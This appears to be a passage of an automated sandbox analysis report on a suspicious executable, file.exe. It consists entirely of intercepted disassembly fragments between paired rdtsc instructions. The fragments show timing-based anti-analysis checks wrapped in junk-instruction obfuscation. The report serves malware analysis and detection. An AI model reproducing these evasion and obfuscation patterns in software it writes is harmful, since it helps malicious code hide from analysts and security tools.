Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C7796 second address: 7C779B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C78FB second address: 7C78FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C84A8 second address: 7C84AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C867A second address: 7C867E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C867E second address: 7C8691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C8764 second address: 7C878F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4D45034D2Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F4D45034D16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C9021 second address: 7C9044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b ja 00007F4D44D0519Ch 0x00000011 jnl 00007F4D44D05196h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C9044 second address: 7C9048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C9A68 second address: 7C9AF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4D44D05196h 0x00000009 jmp 00007F4D44D051A3h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 jmp 00007F4D44D0519Bh 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F4D44D05198h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F4D44D05198h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Bh 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 and di, 17ADh 0x00000056 xchg eax, ebx 0x00000057 push ebx 0x00000058 jno 00007F4D44D0519Ch 0x0000005e pop ebx 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C9AF8 second address: 7C9AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C9AFC second address: 7C9B06 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB715 second address: 7CB71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB45B second address: 7CB466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F4D44D05196h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB71B second address: 7CB720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB466 second address: 7CB47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4D44D0519Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB720 second address: 7CB730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4D45034D1Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB47D second address: 7CB483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB730 second address: 7CB79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F4D45034D18h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jmp 00007F4D45034D21h 0x00000029 push 00000000h 0x0000002b mov esi, 39B7D3B1h 0x00000030 and di, 3F55h 0x00000035 xchg eax, ebx 0x00000036 jg 00007F4D45034D24h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jo 00007F4D45034D18h 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CC1C9 second address: 7CC1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CC1CE second address: 7CC1EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4D45034D21h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CCC8F second address: 7CCC94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE09A second address: 7CE0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE13B second address: 7CE13F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D581F second address: 7D5829 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4D45034D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5829 second address: 7D5874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F4D44D05198h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 sbb ebx, 7EE41D3Ah 0x00000029 stc 0x0000002a push 00000000h 0x0000002c or dword ptr [ebp+122D3198h], edi 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12467B4Ch], ecx 0x0000003a push eax 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e jc 00007F4D44D05196h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D88CF second address: 7D88D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DA830 second address: 7DA867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F4D44D0519Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jnp 00007F4D44D051ADh 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5A0B second address: 7D5A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D68F7 second address: 7D68FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D8A72 second address: 7D8B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, edx 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov ebx, ecx 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F4D45034D18h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov ebx, dword ptr [ebp+12468BF9h] 0x0000003a mov di, si 0x0000003d mov eax, dword ptr [ebp+122D115Dh] 0x00000043 push 00000000h 0x00000045 push ebp 0x00000046 call 00007F4D45034D18h 0x0000004b pop ebp 0x0000004c mov dword ptr [esp+04h], ebp 0x00000050 add dword ptr [esp+04h], 0000001Bh 0x00000058 inc ebp 0x00000059 push ebp 0x0000005a ret 0x0000005b pop ebp 0x0000005c ret 0x0000005d jmp 00007F4D45034D24h 0x00000062 push FFFFFFFFh 0x00000064 push ecx 0x00000065 mov dword ptr [ebp+122D2A3Bh], ebx 0x0000006b pop edi 0x0000006c mov dword ptr [ebp+122D1BF9h], eax 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 je 00007F4D45034D16h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9993 second address: 7D9A3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007F4D44D051A3h 0x00000010 nop 0x00000011 jno 00007F4D44D0519Ch 0x00000017 add di, 6123h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F4D44D05198h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 jng 00007F4D44D0519Ch 0x0000004a mov edi, dword ptr [ebp+122D1E4Eh] 0x00000050 mov eax, dword ptr [ebp+122D14A1h] 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push eax 0x0000005b call 00007F4D44D05198h 0x00000060 pop eax 0x00000061 mov dword ptr [esp+04h], eax 0x00000065 add dword ptr [esp+04h], 00000016h 0x0000006d inc eax 0x0000006e push eax 0x0000006f ret 0x00000070 pop eax 0x00000071 ret 0x00000072 mov di, BF40h 0x00000076 mov di, ax 0x00000079 add bh, FFFFFFFFh 0x0000007c nop 0x0000007d push ebx 0x0000007e push edx 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB80B second address: 7DB80F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D8B0F second address: 7D8B19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9A3A second address: 7D9A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F4D45034D18h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB80F second address: 7DB832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F4D44D051A5h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D8B19 second address: 7D8B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9A4B second address: 7D9A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB832 second address: 7DB846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D45034D20h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9A50 second address: 7D9A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB846 second address: 7DB88C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 and ebx, 455515C5h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F4D45034D18h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov bx, E50Eh 0x0000002f push 00000000h 0x00000031 xor bx, 54F4h 0x00000036 xchg eax, esi 0x00000037 jnl 00007F4D45034D1Eh 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD8DE second address: 7DD8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F4D44D05196h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD8EE second address: 7DD8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD8F8 second address: 7DD921 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+122D37C1h] 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D31A3h], eax 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D1E1Dh], ebx 0x00000022 xchg eax, esi 0x00000023 push ebx 0x00000024 pushad 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E08FA second address: 7E0917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jg 00007F4D45034D1Ch 0x0000000f je 00007F4D45034D1Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E0917 second address: 7E099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007F4D44D05198h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 0000001Dh 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 sub dword ptr [ebp+122D2502h], esi 0x00000026 mov bx, D040h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F4D44D05198h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+122D3A21h] 0x0000004c push 00000000h 0x0000004e jmp 00007F4D44D051A6h 0x00000053 push edx 0x00000054 mov dword ptr [ebp+122D2572h], esi 0x0000005a pop ebx 0x0000005b push eax 0x0000005c jl 00007F4D44D051A0h 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DCA87 second address: 7DCB15 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4D45034D1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b or dword ptr [ebp+122D1EB2h], edi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F4D45034D18h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 push ecx 0x00000033 pop ebx 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F4D45034D18h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 jng 00007F4D45034D18h 0x0000005b mov bh, 43h 0x0000005d mov eax, dword ptr [ebp+122D14C5h] 0x00000063 xor dword ptr [ebp+12466D61h], esi 0x00000069 push FFFFFFFFh 0x0000006b push esi 0x0000006c mov edi, dword ptr [ebp+122D23D0h] 0x00000072 pop ebx 0x00000073 push eax 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 push esi 0x00000078 pop esi 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DDB7C second address: 7DDB80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEA0A second address: 7DEA39 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4D45034D18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jno 00007F4D45034D2Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E19B6 second address: 7E19BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEA39 second address: 7DEA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEA3D second address: 7DEACC instructions: 0x00000000 rdtsc 0x00000002 je 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c sub dword ptr [ebp+12453C7Ch], eax 0x00000012 push dword ptr fs:[00000000h] 0x00000019 xor di, F800h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F4D44D05198h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 0000001Dh 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f mov eax, dword ptr [ebp+122D14D9h] 0x00000045 push 00000000h 0x00000047 push eax 0x00000048 call 00007F4D44D05198h 0x0000004d pop eax 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 add dword ptr [esp+04h], 0000001Ch 0x0000005a inc eax 0x0000005b push eax 0x0000005c ret 0x0000005d pop eax 0x0000005e ret 0x0000005f jmp 00007F4D44D0519Dh 0x00000064 push FFFFFFFFh 0x00000066 jnp 00007F4D44D05196h 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f push ecx 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEACC second address: 7DEAD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E0ABA second address: 7E0ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E3865 second address: 7E386B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E3E27 second address: 7E3E2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1B7D second address: 7E1C11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F4D45034D1Ch 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F4D45034D18h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 sub dword ptr [ebp+122D2A24h], edi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov edi, esi 0x00000040 mov eax, dword ptr [ebp+122D00B9h] 0x00000046 mov edi, esi 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007F4D45034D18h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 00000015h 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 mov dword ptr [ebp+122D27B9h], edx 0x0000006a pushad 0x0000006b or dword ptr [ebp+124554CBh], edi 0x00000071 jmp 00007F4D45034D1Ch 0x00000076 popad 0x00000077 nop 0x00000078 push eax 0x00000079 push eax 0x0000007a push edx 0x0000007b push edi 0x0000007c pop edi 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1C11 second address: 7E1C1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1C1E second address: 7E1C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E3FAA second address: 7E3FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E408E second address: 7E4092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E4092 second address: 7E40AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779AA8 second address: 779AB2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4D45034D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EB878 second address: 7EB87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4EDD second address: 7F4EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4EE3 second address: 7F4EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5383 second address: 7F538D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4D45034D16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F538D second address: 7F53AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F4D44D051A5h 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F53AF second address: 7F53BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F4D45034D16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5530 second address: 7F5534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
